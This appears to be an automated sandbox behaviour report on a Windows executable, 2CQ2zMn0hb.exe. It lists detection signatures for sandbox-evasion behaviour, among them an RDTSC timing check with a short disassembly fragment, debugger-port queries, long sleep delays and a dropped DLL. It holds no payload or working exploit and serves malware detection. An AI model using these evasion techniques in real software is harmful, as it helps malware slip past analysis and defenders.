Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	API/Special instruction interceptor: Address: 3A6EB24
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	API/Special instruction interceptor: Address: 200EB24

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	RDTSC instruction interceptor: First address: 3A321E1 second address: 3A321E1 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8418D10808h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	RDTSC instruction interceptor: First address: 1FD21E1 second address: 1FD21E1 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F8418B75558h 0x00000006 test ecx, ecx 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Memory allocated: 120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Memory allocated: 348C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Memory allocated: 347F0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599555	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597126	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596854	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596748	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594292	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594132	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 593891	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Window / User API: threadDelayed 2965			Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Window / User API: threadDelayed 6829			Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

API coverage: 3.3 %

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 2128	Thread sleep count: 2965 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 2128	Thread sleep count: 6829 > 30	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599555s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -598063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -597126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596854s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596748s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -595000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594292s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594132s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe TID: 7088	Thread sleep time: -593891s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_0040672B FindFirstFileW,FindClose,	0_2_0040672B
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405AFA
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00402868 FindFirstFileW,	3_2_00402868
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_0040672B FindFirstFileW,FindClose,	3_2_0040672B
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Code function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_00405AFA

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599829	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599555	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598516	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597500	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597390	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 597126	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596854	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596748	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595907	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594292	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594132	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Thread delayed: delay time: 593891	Jump to behavior

Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004428000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8!H

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	API call chain: ExitProcess graph end node			graph_0-4591
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	API call chain: ExitProcess graph end node			graph_0-4749

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_6F9726B8 LdrInitializeThunk,VirtualAlloc,

0_2_6F9726B8

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_6F971B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6F971B5F

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Process created: C:\Users\user\Desktop\2CQ2zMn0hb.exe "C:\Users\user\Desktop\2CQ2zMn0hb.exe"

Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Users\user\Desktop\2CQ2zMn0hb.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
